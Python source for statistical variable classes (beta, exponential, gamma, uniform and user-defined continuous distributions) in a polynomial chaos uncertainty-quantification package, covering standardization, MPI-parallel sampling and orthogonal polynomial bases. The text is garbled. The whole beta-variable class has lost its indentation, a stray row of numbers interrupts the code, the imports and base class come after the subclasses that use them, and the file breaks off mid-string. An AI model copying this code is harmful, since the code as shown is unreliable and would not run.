        """
        Searches to replace sring 'pi' with its numpy equivalent in any of the
        values that might contain it.
        """
        if isinstance(self.mean, str) and 'pi' in self.mean:
            self.mean = float(self.mean.replace('pi', str(np.pi)))

        if isinstance(self.stdev, str) and 'pi' in self.stdev:
            self.stdev = float(self.stdev.replace('pi', str(np.pi)))

    def get_mean(self):
        """
        Return the mean of the variable.
        """
        return self.mean
class BetaVariable(ContinuousVariable):
"""
Inputs: alpha- the alpha parameter of the variable
beta- the beta parameter of the variable
interval_low- the low interval of the variable
interval_high- the high interval of the variable
order- the order of the model to calculate the orthogonal
polynomials and norm squared values
type- the type of variable
name- the name of the variable
number- the number of the variable from the file
Represents a beta variable. The methods in this class correspond to
those of a beta variable.
"""
__slots__ = ('alpha', 'beta')
equation = '((A+B-1)! * (x)**(A-1) * (1-x)**(B-1)) / ((A-1)! * (B-1)!)'
def generate_orthopoly(self):
"""
Generates the orthogonal polynomials for a beta variable up to the
self.self.order of polynomial expansion.
"""
var_orthopoly_vect = np.zeros(self.order + 1, dtype=object)
self.var_orthopoly_vect = np.zeros(self.order + 1, dtype=object)
x = self.x
a = parse_expr(str(Fraction(self.alpha)))
b = parse_expr(str(Fraction(self.beta)))
decimals = 30
for n in range(self.order + 1):
if n == 0:
var_orthopoly_vect[n] = 1
self.var_orthopoly_vect[n] = 1
elif n == 1:
var_orthopoly_vect[n] = x - (a / (a + b))
self.var_orthopoly_vect[n] = x - (a / (a + b))
else:
var_orthopoly_vect[n] = x ** n
pasc = pascal(self.order + 1, kind='lower')
for m in range(n):
var_orthopoly_vect[n] -= parse_expr(
f'{pasc[n, m]} * ((a+n-1)!*(a+b+2*m-1)!)/((a+m-1)!*(a+b+n+m-1)!)*({var_orthopoly_vect[m]})',
local_dict={'a':a, 'b':b, 'n':n, 'm':m, 'x':x}
)
self.var_orthopoly_vect[n] = N(var_orthopoly_vect[n], decimals)
return self.var_orthopoly_vect
def standardize(self, orig, std_vals):
"""
Inputs: orig- the un-standardized values
std_vals- the attribue name for the standardized vals
Overrides the Variable class standardize to align with
a beta distribution.
"""
original = getattr(self, orig)
standard = (
(original[:] - self.interval_low)
/ (self.interval_high - self.interval_low)
)
setattr(self, std_vals, standard)
return getattr(self, std_vals)
def standardize_points(self, values):
"""
Inputs: values- unstandardized points corresponding to the variable's
distribution
Standardizes and returns the inputs points.
"""
standard = (
(values - self.interval_low)
/ (self.interval_high - self.interval_low)
)
return standard
def unstandardize_points(self, value):
"""
Inputs: value- the standardized value to be unstandardized
Calculates and returns the unscaled variable value from the
standardized value.
"""
unscaled_value = value = (
value * (self.interval_high - self.interval_low)
+self.interval_low
)
return unscaled_value
def check_distribution(self):
"""
Overrides the Variable class check_distribution to align with
an beta distribution.
"""
shift = 8
comm = MPI_COMM_WORLD
rank = comm.rank
if rank == 0 and (np.max(self.std_vals) > shift) or (np.min(self.std_vals) < -shift):
warn(
f'Large standardized value for variable {self.name} '
'with Beta distribution found. Check input and run matrix.'
)
return -1
def generate_samples(self, samp_size):
"""
Inputs: samp_size- the number of points needed to be generated
Overrides the Variable class generate_samples to align with
an beta distribution.
"""
low_percent = 0
high_percent = 1
dist = beta(a=self.alpha, b=self.beta)
rnd_hypercube = uniform_hypercube(low_percent, high_percent, samp_size)
vals = (
(dist.ppf(rnd_hypercube) * (self.interval_high - self.interval_low))
+self.interval_low
)
return vals
    def get_resamp_vals(self, samp_size):
        """
        Inputs: samp_size- the number of samples to generate according to the
                distribution

        Overrides the Variable class get_resamp_vals to align with
        a beta distribution. Each MPI rank draws its share of the samples
        and the full vector is assembled on every rank via Allgatherv.
        """
        comm = MPI_COMM_WORLD
        size = comm.size
        rank = comm.rank
        # Split samp_size across ranks; the first `rem` ranks take one extra.
        base = samp_size // size
        rem = samp_size % size
        count = base + (rank < rem)
        ranks = np.arange(0, size, dtype=int)
        # Per-rank counts and displacements for the Allgatherv receive buffer.
        seq_count = (ranks < rem) + base
        seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
        self.resample = np.zeros(samp_size)
        resample = np.random.beta(a=self.alpha, b=self.beta, size=count)
        comm.Allgatherv(
            [resample, count, MPI_DOUBLE],
            [self.resample, seq_count, seq_disp, MPI_DOUBLE]
        )
        # The bound is included to help with ProbabilityBox convergence.
        self.resample[0] = 0
        self.resample[1] = 1
        return self.resample
def check_num_string(self):
"""
Searches to replace sring 'pi' with its numpy equivalent in any of the
values that might contain it.
"""
if isinstance(self.alpha, str) and 'pi' in self.alpha:
self.alpha = float(self.alpha.replace('pi', str(np.pi)))
if isinstance(self.beta, str) and 'pi' in self.beta:
self.beta = float(self.beta.replace('pi', str(np.pi)))
if isinstance(self.interval_low, str) and 'pi' in self.interval_low:
self.interval_low = float(self.interval_low.replace('pi', str(np.pi)))
if isinstance(self.interval_high, str) and 'pi' in self.interval_high:
self.interval_high = float(self.interval_high.replace('pi', str(np.pi)))
def get_mean(self):
"""
Return the mean of the variable.
"""
scale = self.interval_high - self.interval_low
mean = (
self.interval_low + scale * (self.alpha / (self.alpha + self.beta))
)
return mean
class ExponentialVariable(ContinuousVariable):
    """
    Inputs: lambd- the lambda parameter of the variable values
            interval_low- the low interval of the variable
            order- the order of the model to calculate the orthogonal
            polynomials and norm squared values
            type- the type of variable
            name- the name of the variable
            number- the number of the variable from the file

    Represents an exponential variable. The methods in this class correspond
    to those of an exponential variable. The rate parameter is stored under
    the slot name 'lambda' (a Python keyword), so it is always accessed via
    getattr/setattr.
    """
    # Fixed: ('lambda') is a plain string, not a tuple; it happened to work
    # only because a string __slots__ is treated as a single slot name.
    __slots__ = ('lambda',)
    equation = 'lambd * exp(-lambd * x)'
    def standardize(self, orig, std_vals):
        """
        Inputs: orig- the un-standardized values
                std_vals- the attribute name for the standardized vals

        Overrides the Variable class standardize to align with an
        exponential distribution (shift by interval_low only).
        """
        original = getattr(self, orig)
        standard = (original[:] - self.interval_low)
        setattr(self, std_vals, standard)
        return getattr(self, std_vals)
    def standardize_points(self, values):
        """
        Inputs: values- unstandardized points corresponding to the variable's
                distribution

        Standardizes and returns the inputs points.
        """
        return values - self.interval_low
    def unstandardize_points(self, value):
        """
        Inputs: value- the standardized value to be unstandardized

        Calculates and returns the unscaled variable value from the
        standardized value.
        """
        return value + self.interval_low
    def check_distribution(self):
        """
        Overrides the Variable class check_distribution to align with
        an exponential distribution. Returns -1 on a root-rank failure.
        """
        shift = 15
        comm = MPI_COMM_WORLD
        rank = comm.rank
        if rank == 0 and ((np.min(self.std_vals) < 0)
            or (np.max(self.std_vals) > shift)
        ):
            warn(
                f'Large standardized value for variable {self.name} '
                'with exponential distribution found. Check input and run '
                'matrix.'
            )
            return -1
    def generate_samples(self, samp_size):
        """
        Inputs: samp_size- the number of samples to generate according to the
                distribution

        Overrides the Variable class generate_samples to align with
        an exponential distribution.
        """
        # Shift the top percentile just below 1 so ppf never returns inf.
        percent_shift = 8e-17
        low_percent = 0
        high_percent = 1 - percent_shift
        dist = expon(scale=1 / getattr(self, 'lambda'))
        rnd_hypercube = uniform_hypercube(low_percent, high_percent, samp_size)
        vals = dist.ppf(rnd_hypercube) + self.interval_low
        np.random.shuffle(vals)
        return vals
    def get_resamp_vals(self, samp_size):
        """
        Inputs: samp_size- the number of samples to generate according to the
                distribution

        Overrides the Variable class get_resamp_vals to align with
        an exponential distribution. Each MPI rank draws its share and the
        full vector is assembled on every rank via Allgatherv.
        """
        comm = MPI_COMM_WORLD
        size = comm.size
        rank = comm.rank
        base = samp_size // size
        rem = samp_size % size
        count = base + (rank < rem)
        ranks = np.arange(0, size, dtype=int)
        seq_count = (ranks < rem) + base
        seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
        self.resample = np.zeros(samp_size)
        resample = np.random.exponential(
            scale=(1 / getattr(self, 'lambda')), size=count
        )
        comm.Allgatherv(
            [resample, count, MPI_DOUBLE],
            [self.resample, seq_count, seq_disp, MPI_DOUBLE]
        )
        # The bound is included to help with ProbabilityBox convergence.
        self.resample[0] = 0
        return self.resample
    def check_num_string(self):
        """
        Searches to replace string 'pi' with its numpy equivalent in any of
        the values that might contain it.
        """
        lambd = getattr(self, 'lambda')
        if isinstance(lambd, str) and 'pi' in lambd:
            setattr(self, 'lambda', float(lambd.replace('pi', str(np.pi))))
    def get_mean(self):
        """
        Return the mean of the variable (interval_low + 1/lambda).
        """
        return self.interval_low + (1 / getattr(self, 'lambda'))
class GammaVariable(ContinuousVariable):
    """
    Inputs: alpha- the alpha (shape) parameter of the variable
            theta- the theta (scale) parameter of the variable
            interval_low- the low interval of the variable
            order- the order of the model to calculate the orthogonal
            polynomials and norm squared values
            type- the type of variable
            name- the name of the variable
            number- the number of the variable from the file

    Represents a gamma variable. The methods in this class correspond to
    those of a gamma variable.
    """
    __slots__ = ('alpha', 'theta')
    # This is the standardized form required for the UQPCE variable basis and
    # norm squared.
    equation = '(x**(A-1) * exp(-x)) / (A-1)!'
    def standardize(self, orig, std_vals):
        """
        Inputs: orig- the un-standardized values
                std_vals- the attribute name for the standardized vals

        Overrides the Variable class standardize to align with
        a gamma distribution (shift by interval_low, divide by theta).
        """
        standard = (getattr(self, orig) - self.interval_low) / self.theta
        setattr(self, std_vals, standard)
        return getattr(self, std_vals)
    def standardize_points(self, values):
        """
        Inputs: values- unstandardized points corresponding to the variable's
                distribution

        Standardizes and returns the inputs points.
        """
        return (values - self.interval_low) / self.theta
    def unstandardize_points(self, value):
        """
        Inputs: value- the standardized value to be unstandardized

        Calculates and returns the unscaled variable value from the
        standardized value.
        """
        return (value * self.theta) + self.interval_low
    def check_distribution(self):
        """
        Overrides the Variable class check_distribution to align with
        a gamma distribution. Returns -1 on a root-rank failure.
        """
        shift = 15
        comm = MPI_COMM_WORLD
        rank = comm.rank
        if rank == 0 and ((np.max(self.std_vals) > shift)
            or (np.min(self.std_vals) < 0)
        ):
            warn(
                f'Large standardized value for variable {self.name} '
                'with gamma distribution found. Check input and run matrix.'
            )
            return -1
    def generate_samples(self, samp_size):
        """
        Inputs: samp_size- the number of points needed to be generated

        Overrides the Variable class generate_samples to align with
        a gamma distribution.
        """
        # Shift the top percentile just below 1 so ppf never returns inf.
        percent_shift = 8e-17
        low_percent = 0
        high_percent = 1 - percent_shift
        dist = gamma(self.alpha, scale=self.theta)
        rnd_hypercube = uniform_hypercube(low_percent, high_percent, samp_size)
        vals = dist.ppf(rnd_hypercube) + self.interval_low
        return vals
    def get_resamp_vals(self, samp_size):
        """
        Inputs: samp_size- the number of samples to generate according to the
                distribution

        Overrides the Variable class get_resamp_vals to align with
        a gamma distribution. Each MPI rank draws its share and the full
        vector is assembled on every rank via Allgatherv. Samples use
        scale=1 because they live in the standardized (theta-scaled) space.
        """
        comm = MPI_COMM_WORLD
        size = comm.size
        rank = comm.rank
        base = samp_size // size
        rem = samp_size % size
        count = base + (rank < rem)
        ranks = np.arange(0, size, dtype=int)
        seq_count = (ranks < rem) + base
        seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
        self.resample = np.zeros(samp_size)
        resample = np.random.gamma(shape=self.alpha, scale=1, size=count)
        comm.Allgatherv(
            [resample, count, MPI_DOUBLE],
            [self.resample, seq_count, seq_disp, MPI_DOUBLE]
        )
        # The bound is included to help with ProbabilityBox convergence.
        self.resample[0] = 0
        return self.resample
    def check_num_string(self):
        """
        Searches to replace string 'pi' with its numpy equivalent in any of
        the values that might contain it.
        """
        if isinstance(self.alpha, str) and 'pi' in self.alpha:
            self.alpha = float(self.alpha.replace('pi', str(np.pi)))
        if isinstance(self.theta, str) and 'pi' in self.theta:
            self.theta = float(self.theta.replace('pi', str(np.pi)))
    def get_mean(self):
        """
        Return the mean of the variable (interval_low + alpha * theta).
        """
        return self.interval_low + (self.alpha * self.theta)
| 32.194163 | 116 | 0.566064 | from builtins import setattr, getattr
from fractions import Fraction
import math
from multiprocessing import Process, Manager
from warnings import warn, showwarning
try:
from sympy import *
import numpy as np
from scipy.stats import norm, beta, gamma, expon
from scipy.linalg import pascal
from scipy.integrate import quad
from sympy import (
symbols, zeros, integrate, N, factorial, sqrt, simplify, sympify, Abs
)
from sympy.core.numbers import NaN
from sympy.integrals.integrals import Integral
from sympy.parsing.sympy_parser import parse_expr
from sympy.solvers import solve
from sympy.utilities.lambdify import lambdify
from mpi4py import MPI
from mpi4py.MPI import (
COMM_WORLD as MPI_COMM_WORLD, DOUBLE as MPI_DOUBLE, MAX as MPI_MAX
)
except:
warn('Ensure that all required packages are installed.')
exit()
from PCE_Codes.custom_enums import Distribution, UncertaintyType
from PCE_Codes._helpers import _warn, uniform_hypercube
from PCE_Codes.variables.variable import Variable
from PCE_Codes.error import VariableInputError
class ContinuousVariable(Variable):
    """
    Inputs: pdf- the equation that defines the pdf of the variable values
            interval_low- the low interval of the variable
            interval_high- the high interval of the variable
            order- the order of the model to calculate the orthogonal
            polynomials and norm squared values
            type- the type of variable
            name- the name of the variable
            number- the number of the variable from the file

    Class represents a continuous variable with a user-supplied pdf string.
    """
    def __init__(
        self, pdf, interval_low, interval_high, order=2,
        type='aleatory', name='', number=0
    ):
        self.distribution = pdf
        self.interval_low = interval_low
        self.interval_high = interval_high
        self.order = order
        self.type = UncertaintyType.from_name(type)
        self.name = f'x{number}' if name == '' else name
        self.var_str = f'x{number}'
        self.x = symbols(self.var_str)
        self.low_approx = self.interval_low
        self.high_approx = self.interval_high
        self.bounds = (self.interval_low, self.interval_high)
        self.std_bounds = (self.interval_low, self.interval_high)
        # split at white space and rejoin to remove all whitespace- make safer
        self.distribution = ''.join(self.distribution.split())
        # NOTE(review): parse_expr evaluates the input string symbolically;
        # the pdf string must come from a trusted input file.
        self.distribution = (
            parse_expr(self.distribution, local_dict={'x':self.x})
        )
        self.check_num_string()
        self.get_probability_density_func() # make sure sum over interval = 1
        self.recursive_var_basis(
            self.distribution, self.interval_low, self.interval_high, self.order
        )
        self.create_norm_sq(
            self.interval_low, self.interval_high, self.distribution
        )
        if self.type == UncertaintyType.EPISTEMIC:
            warn(
                'The ContinuousVariable is usually not epistemic. For an epistemic '
                'variable, consider using the uniform distribution with type '
                'epistemic.'
            )
    showwarning = _warn
    def get_probability_density_func(self):
        """
        Turns the input function into the corresponding probability density
        function by normalizing it so it integrates to 1 over the interval.
        """
        diff_tol = 1e-5
        tol = 1e-12
        f = lambdify(self.x, self.distribution, ('numpy', 'sympy'))
        const = quad(f, self.low_approx, self.high_approx, epsabs=tol, epsrel=tol)[0]
        # Snap a near-integer normalization constant to the integer to
        # avoid tiny numerical residue in the pdf.
        const_rnd = np.round(const)
        if np.abs(const_rnd - const) < diff_tol:
            const = const_rnd
        self.distribution = self.distribution / const
    def standardize(self, orig, std_vals):
        """
        Inputs: orig- the un-standardized values
                std_vals- the attribute name for the standardized vals

        For each variable, it adds a new attribute for the standardized values
        from the original input values. A general continuous variable is
        assumed already standardized, so the values are copied unchanged.
        """
        setattr(self, std_vals, getattr(self, orig))
        return getattr(self, std_vals)
    def standardize_points(self, values):
        """
        Inputs: values- unstandardized points corresponding to the variable's
                distribution

        Standardizes and returns the inputs points.
        """
        return values # general variable must already be standardized
    def unstandardize_points(self, value):
        """
        Inputs: value- the standardized value to be unstandardized

        Calculates and returns the unscaled variable value from the
        standardized value.
        """
        return value # general variable must already be standardized
    def check_distribution(self):
        """
        Checks all values in an array to ensure that they are standardized.
        Returns -1 on a root-rank failure; None otherwise.
        """
        comm = MPI_COMM_WORLD
        rank = comm.rank
        mx = np.max(self.std_vals)
        mn = np.min(self.std_vals)
        # Fixed precedence bug: `rank == 0 and A or B` parsed as
        # `(rank == 0 and A) or B`, so non-root ranks warned whenever the
        # minimum fell below the low bound.
        if rank == 0 and (mx > self.high_approx or mn < self.low_approx):
            warn(
                f'Large standardized value for variable {self.name} '
                'with user distribution found. Check input and run matrix.'
            )
            return -1
    def generate_samples(self, samp_size):
        """
        Inputs: samp_size- the number of points needed to be generated

        Generates points according to the Latin hypercube; each point is in an
        interval of equal probability. Tries inverse-CDF sampling first (with
        timeouts on the symbolic solves); falls back to rejection-acceptance
        sampling when the CDF or its inverse cannot be found.
        """
        decimals = 30
        comm = MPI_COMM_WORLD
        size = comm.size
        rank = comm.rank
        is_manager = (rank == 0)
        # Split samp_size across ranks; the first `rem` ranks take one extra.
        base = samp_size // size
        rem = samp_size % size
        count = base + (rank < rem)
        ranks = np.arange(0, size, dtype=int)
        seq_count = (ranks < rem) + base
        seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
        self.inverse_func = None
        self.failed = None
        try:
            y = symbols('y')
            # NOTE(review): self.failed was set to None on the line above,
            # so this guard can never fire; kept for behavioral parity.
            if self.failed is not None:
                raise AttributeError # skip if has already gone through and failed
            # solve for the cumulative density function with 10s timeout
            if is_manager and not hasattr(self, 'cum_dens_func'):
                manager = Manager()
                proc_dict = manager.dict()
                cdf_proc = Process(target=self._calc_cdf, args=(proc_dict,))
                cdf_proc.start()
                cdf_proc.join(10.0)
                if cdf_proc.is_alive():
                    cdf_proc.terminate()
                try:
                    self.cum_dens_func = proc_dict['cum_dens_func']
                    # solve for the inverse function with 10s timeout
                    inv_proc = Process(target=self._invert, args=(proc_dict,))
                    inv_proc.start()
                    inv_proc.join(10.0)
                    if inv_proc.is_alive():
                        inv_proc.terminate()
                    self.inverse_func = proc_dict['inverse_func']
                except KeyError:
                    self.failed = 1
            self.failed = comm.bcast(self.failed, root=0)
            if not self.failed:
                self.inverse_func = comm.bcast(self.inverse_func, root=0)
            else:
                raise ValueError
            # plug in random uniform 0 -> 1 to solve for x vals
            all_samples = np.zeros(samp_size)
            for i in range(len(self.inverse_func)): # multiple solutions
                inv_func = (
                    np.vectorize(
                        lambdify(y, str(self.inverse_func[i]), ('numpy', 'sympy'))
                    )
                )
                samples = N(inv_func(uniform_hypercube(0, 1, count)), decimals)
                comm.Allgatherv(
                    [samples, count, MPI_DOUBLE],
                    [all_samples, seq_count, seq_disp, MPI_DOUBLE]
                )
                # Accept the first inverse branch whose samples stay in bounds.
                if np.min(all_samples) >= self.low_approx and np.max(all_samples) <= self.high_approx:
                    np.random.shuffle(all_samples)
                    return all_samples
            if not (
                (np.min(samples) >= self.low_approx) and (np.max(samples) <= self.high_approx)
            ):
                raise ValueError
        # if cdf or inverse func can't be found, use rejection-acceptance sampling
        except (ValueError, NameError, AttributeError):
            func = lambdify(self.x, self.distribution, ('numpy', 'sympy'))
            try_total = 5000
            tries = try_total // size + (rank < try_total % size)
            max_all = np.zeros(1)
            # Estimate the pdf maximum by random probing for the envelope.
            try:
                max_val = (
                    np.max(func(
                        np.random.uniform(
                            self.low_approx, self.high_approx, tries
                        )
                    ))
                )
            except RuntimeError:
                max_val = np.max(
                    func(
                        np.random.uniform(
                            self.low_approx, self.high_approx, tries
                        )
                    )
                ).astype(float)
            comm.Allreduce(
                [max_val, MPI_DOUBLE], [max_all, MPI_DOUBLE], op=MPI_MAX
            )
            samples = np.zeros(count)
            all_samples = np.zeros(samp_size)
            i = 0
            j = 0
            y_vals = np.random.uniform(0, max_all, count)
            x_vals = np.random.uniform(self.low_approx, self.high_approx, count)
            func_vals = func(x_vals)
            # while loop until all 'samp_size' samples have been generated
            while i < count:
                if j == count:
                    # Exhausted this batch of candidates; draw a fresh one.
                    y_vals = np.random.uniform(0, max_all, count)
                    x_vals = np.random.uniform(self.low_approx, self.high_approx, count)
                    func_vals = func(x_vals)
                    j = 0
                if y_vals[j] <= func_vals[j]:
                    samples[i] = x_vals[j]
                    i += 1
                j += 1
            comm.Allgatherv(
                [samples, count, MPI_DOUBLE],
                [all_samples, seq_count, seq_disp, MPI_DOUBLE]
            )
            np.random.shuffle(all_samples)
            return all_samples
    def create_norm_sq(self, low, high, func):
        """
        Inputs: low- the low interval bound for the distribution
                high- the high interval bound for the distribution
                func- the function corresponding to the distribution

        Calculates the norm squared values up to the order of polynomial
        expansion based on the probability density function and its
        corresponding orthogonal polynomials.
        """
        orthopoly_count = len(self.var_orthopoly_vect)
        self.norm_sq_vals = np.zeros(orthopoly_count)
        tries = 2
        zero = 0
        # is rounded off at 50 decimals, requiring two decimals places
        norm_sq_thresh = 1e-49
        for i in range(orthopoly_count):
            proc_dict = {}
            # Try successive _norm_sq strategies until one yields a
            # nonzero result.
            for j in range(tries):
                self._norm_sq(low, high, func, i, j, proc_dict)
                try:
                    if (proc_dict['out'] is not None) and (not math.isclose(proc_dict['out'], zero)):
                        self.norm_sq_vals[i] = proc_dict['out']
                        break # only breaks inner loop
                except KeyError:
                    pass
        if (self.norm_sq_vals == zero).any():
            warn(f'Finding the norm squared for variable {self.name} failed.')
        if (self.norm_sq_vals <= norm_sq_thresh).any():
            warn(
                f'At least one norm squared value for variable {self.name} is '
                f'very small. This can introduce error into the model.'
            )
    def _norm_sq(self, low, high, func, i, region, proc_dict):
        """
        Inputs: low- the low interval bound for the distribution
                high- the high interval bound for the distribution
                func- the function corresponding to the distribution
                i- the index of the norm squared to calculate
                region- which sympy calculation to try for the norm squared
                proc_dict- the dictionary in which the output will be stored

        An assistant to create_norm_sq; allows the norm squared calculations to
        have a timeout if an error isn't raised and the solution isn't found
        reasonably quickly. Each `region` value tries a different way of
        building the integrand before numerical quadrature.
        """
        proc_dict['out'] = None
        # round 0.99999999 to 1 to reduce error; if value is small, don't round
        thresh = 1e-2
        tol = 1e-12
        diff_tol = 1e-8
        decimals = 30
        # Translate the string bounds into numeric quadrature limits.
        if high == 'oo':
            ul = np.inf
        elif high == 'pi':
            ul = np.pi
        elif high == '-pi':
            ul = -np.pi
        else:
            ul = high
        if low == '-oo':
            ll = -np.inf
        elif low == 'pi':
            ll = np.pi
        elif low == '-pi':
            ll = -np.pi
        else:
            ll = low
        if region == 0:
            try:
                f = lambdify(self.x, func * self.var_orthopoly_vect[i] ** 2, ('numpy', 'sympy'))
                ans = quad(f, ll, ul, epsabs=tol, epsrel=tol)[0]
                if np.abs(int(ans) - ans) < diff_tol:
                    proc_dict['out'] = int(ans)
                elif ans > thresh:
                    proc_dict['out'] = round(ans, 7)
                else:
                    proc_dict['out'] = ans
            except:
                pass
        elif region == 1:
            try:
                # Evaluate the symbolic product numerically before lambdify.
                f = lambdify(
                    self.x,
                    N(func * self.var_orthopoly_vect[i] ** 2, decimals),
                    ('numpy', 'sympy')
                )
                ans = quad(f, ll, ul, epsabs=tol, epsrel=tol)[0]
                if np.abs(int(ans) - ans) < diff_tol:
                    proc_dict['out'] = int(ans)
                elif ans > thresh:
                    proc_dict['out'] = round(ans, 7)
                else:
                    proc_dict['out'] = ans
            except:
                pass
        elif region == 2:
            try:
                # Rebuild the integrand from its string form as a last resort.
                f = lambdify(
                    self.x,
                    sympify(f'{func} * ({self.var_orthopoly_vect[i]}) ** 2'),
                    ('numpy', 'sympy')
                )
                ans = quad(f, ll, ul, epsabs=tol, epsrel=tol)[0]
                if np.abs(int(ans) - ans) < diff_tol:
                    proc_dict['out'] = int(ans)
                elif ans > thresh:
                    proc_dict['out'] = round(ans, 7)
                else:
                    proc_dict['out'] = ans
            except:
                pass
    def recursive_var_basis(self, func, low, high, order):
        """
        Inputs: func- the probability density function of the input equation
                low- the low bound on the variable
                high- the high bound on the variable
                order- the order of polynomial expansion

        Recursively calculates the variable basis up to the input 'order'
        via Gram-Schmidt orthogonalization of the monomials against the pdf.
        """
        tol = 1e-12
        if low == '-oo':
            low = -np.inf
        if high == 'oo':
            high = np.inf
        if order == 0:
            self.poly_denom = np.zeros(self.order, dtype=object)
            self.var_orthopoly_vect = np.zeros(self.order + 1, dtype=object)
            self.var_orthopoly_vect[order] = 1
            return
        else:
            self.recursive_var_basis(func, low, high, order - 1)
            curr = self.x ** order
            for i in range(order):
                orthopoly = self.var_orthopoly_vect[i]
                # Cache each <p_i, p_i> denominator across recursion levels.
                if self.poly_denom[i] == 0:
                    f = lambdify(self.x, orthopoly ** 2 * func, ('numpy', 'sympy'))
                    self.poly_denom[i] = quad(f, low, high, epsabs=tol, epsrel=tol)[0]
                f = lambdify(self.x, self.x ** order * orthopoly * func, ('numpy', 'sympy'))
                intergal_eval = (
                    quad(f, low, high, epsabs=tol, epsrel=tol)[0]
                    / self.poly_denom[i]
                ) * orthopoly
                curr -= intergal_eval
            self.var_orthopoly_vect[order] = curr
            if order == self.order and (self.var_orthopoly_vect == 0).any():
                warn(
                    f'Variable {self.name} has at least one orthogonal polynomial '
                    f'that is zero. The model may not be accurate'
                )
            return
    def get_resamp_vals(self, samp_size):
        """
        Inputs: samp_size- the number of samples to generate according to the
                distribution

        Generates samp_size number of samples according to the pdf of the
        Variable.
        """
        self.resample = self.generate_samples(samp_size)
        return self.resample
    def _calc_cdf(self, proc_dict):
        """
        Inputs: proc_dict- the dictionary in which the output will be stored

        Calculates the cumulative density function of the distribution.
        Run in a subprocess so the symbolic integration can be timed out.
        """
        try:
            proc_dict['cum_dens_func'] = integrate(
                self.distribution, (self.x, self.interval_low, self.x)
            )
        except RuntimeError:
            pass
    def _invert(self, proc_dict):
        """
        Inputs: proc_dict- the dictionary in which the output will be stored

        Solves for the inverse function of the cumulative density function.
        Run in a subprocess so the symbolic solve can be timed out.
        """
        y = symbols('y')
        try:
            proc_dict['inverse_func'] = solve(f'{self.cum_dens_func}-y', self.x)
        except (NameError, NotImplementedError, AttributeError, RuntimeError):
            pass
    def check_num_string(self):
        """
        Checks for values in the input file that correspond to pi, -oo, or oo.
        If these values exist, they are converted into values that Python can
        use to create resampling points (infinite bounds are approximated by
        mean +/- 10 standard deviations).
        """
        decimals = 30
        if self.interval_low == '-oo' or self.interval_high == 'oo':
            x = self.x
            integrate_tuple = (x, self.interval_low, self.interval_high)
            self.mean = integrate(x * self.distribution, integrate_tuple)
            stdev = (
                math.sqrt(
                    integrate(x ** 2 * self.distribution, integrate_tuple)
                    -self.mean ** 2
                )
            )
        if isinstance(self.interval_low, str):
            if 'pi' in self.interval_low:
                temp_low = float(self.interval_low.replace('pi', str(np.pi)))
                self.interval_low = temp_low
                self.low_approx = temp_low
            elif self.interval_low == '-oo':
                self.low_approx = N(self.mean - 10 * stdev, decimals)
        if isinstance(self.interval_high, str):
            if 'pi' in self.interval_high:
                temp_high = float(self.interval_high.replace('pi', str(np.pi)))
                self.interval_high = temp_high
                self.high_approx = temp_high
            elif self.interval_high == 'oo':
                self.high_approx = N(self.mean + 10 * stdev, decimals)
    def get_mean(self):
        """
        Return the mean of the variable, computing and caching it on first use.
        """
        decimals = 30
        if not hasattr(self, 'mean'):
            x = self.x
            integrate_tuple = (x, self.interval_low, self.interval_high)
            self.mean = integrate(x * self.distribution, integrate_tuple)
        return N(self.mean, decimals)
class UniformVariable(ContinuousVariable):
    """
    Inputs: interval_low- the low interval of the variable
            interval_high- the high interval of the variable
            order- the order of the model to calculate the orthogonal
            polynomials and norm squared values
            type- the type of variable
            name- the name of the variable
            number- the number of the variable from the file

    Represents a uniform variable. The methods in this class correspond to
    those of a uniform variable (standardized onto [-1, 1], with Legendre
    polynomials as the orthogonal basis).
    """
    def __init__(
        self, interval_low, interval_high, order=2, type='aleatory',
        name='', number=0
    ):
        if not interval_low < interval_high:
            raise VariableInputError(
                'UniformVariable interval_high must be greater than '
                'interval_low.'
            )
        self.interval_low = interval_low
        self.interval_high = interval_high
        self.order = order
        self.type = UncertaintyType.from_name(type)
        self.name = f'x{number}' if name == '' else name
        self.var_str = f'x{number}'
        self.x = symbols(self.var_str)
        self.distribution = Distribution.UNIFORM
        self.generate_orthopoly()
        self.low_approx = self.interval_low
        self.high_approx = self.interval_high
        self.bounds = (self.interval_low, self.interval_high)
        self.std_bounds = (-1, 1)
        self.check_num_string()
    showwarning = _warn
    def generate_orthopoly(self):
        """
        Generates the orthogonal polynomials for a uniform variable up to the
        order of polynomial expansion, using the Legendre three-term
        recurrence: n*P_n = (2n-1)*x*P_{n-1} - (n-1)*P_{n-2}.
        """
        self.var_orthopoly_vect = np.zeros(self.order + 1, dtype=object)
        x = self.x
        for n in range(self.order + 1):
            if n == 0:
                self.var_orthopoly_vect[n] = 1
            elif n == 1:
                self.var_orthopoly_vect[n] = x
            else:
                self.var_orthopoly_vect[n] = (
                    (
                        (2 * n - 1) * x
                        * self.var_orthopoly_vect[n - 1] - (n - 1)
                        * self.var_orthopoly_vect[n - 2]
                    )
                    / n
                )
    def standardize(self, orig, std_vals):
        """
        Inputs: orig- the un-standardized values
                std_vals- the attribute name for the standardized vals

        Overrides the Variable class standardize to align with
        a uniform distribution (maps the interval onto [-1, 1]).
        """
        original = getattr(self, orig)
        mean = (
            (self.interval_high - self.interval_low) / 2 + self.interval_low
        )
        stdev = (self.interval_high - self.interval_low) / 2
        standard = (original[:] - mean) / stdev
        setattr(self, std_vals, standard)
        return getattr(self, std_vals)
    def standardize_points(self, values):
        """
        Inputs: values- unstandardized points corresponding to the variable's
                distribution

        Standardizes and returns the inputs points onto [-1, 1].
        """
        mean = (
            (self.interval_high - self.interval_low) / 2 + self.interval_low
        )
        stdev = (self.interval_high - self.interval_low) / 2
        return (values - mean) / stdev
    def unstandardize_points(self, value):
        """
        Inputs: value- the standardized value to be unstandardized

        Calculates and returns the unscaled variable value from the
        standardized value.
        """
        mean = (
            (self.interval_high - self.interval_low) / 2 + self.interval_low
        )
        stdev = (self.interval_high - self.interval_low) / 2
        return (value * stdev) + mean
    def check_distribution(self):
        """
        Overrides the Variable class check_distribution to align with
        a uniform distribution. Returns -1 when values fall outside [-1, 1]
        (with a small tolerance).

        NOTE(review): unlike the sibling classes, this method has no
        rank == 0 guard, so under MPI every rank emits the warning —
        confirm whether that is intended.
        """
        if (
            (np.max(self.std_vals) > 1 + 1e-5)
            or (np.min(self.std_vals) < -1 - 1e-5)
        ):
            warn(
                f'Standardized value for variable {self.name} with uniform '
